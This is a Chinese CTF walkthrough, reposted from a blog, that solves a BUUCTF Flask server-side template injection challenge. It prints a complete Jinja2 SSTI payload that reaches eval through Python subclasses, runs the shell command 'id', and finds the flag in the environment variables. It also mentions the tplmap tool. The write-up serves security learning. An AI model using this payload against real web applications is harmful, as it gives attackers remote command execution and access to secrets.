文章目录
环境
BUUCTF上的在线环境,启动靶机,获取链接:
http://node4.buuoj.cn:27904
解题思路
访问后显示页面。
![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/02aff8b26a834a7faa74046e2f26ce5c.png)
![[Flask]SSTI](https://www.johngo689.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
根据题目提示是考SSTI,所以我们传个name参数看看。
http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/705bb8605af14cfd855c541e1e08c424.png)
我们在构造{{2*3}}看看,是否存在SSTI。
![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/a45d8358cf23425cac6df8cab020fe7c.png)
成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。
这里我在网上找的:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/dc515642a6024af7b499c8be41f540d9.png)
成功执行,接下来找flag,最后发现在env中发现了flag。
![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/2b78ea67dfc04346a06658830e975a55.png)
通过网上的资料了解到tplmap脚本可以梭哈。
![[Flask]SSTI](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/3d34844669334cb2bd240af45ce1f7e0.png)
参考
https://blog.csdn.net/qq_36241198/article/details/114882798
SSTI模板注入绕过(进阶篇)
SSTI模板注入及绕过姿势(基于Python-Jinja2)
[Flask(Jinja2)服务端模板注入漏洞(SSTI)]学习简记
Original: https://blog.csdn.net/weixin_44033675/article/details/121409647
Author: 1ance.
Title: [Flask]SSTI
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/746375/
转载文章受原作者版权保护。转载请注明原作者出处!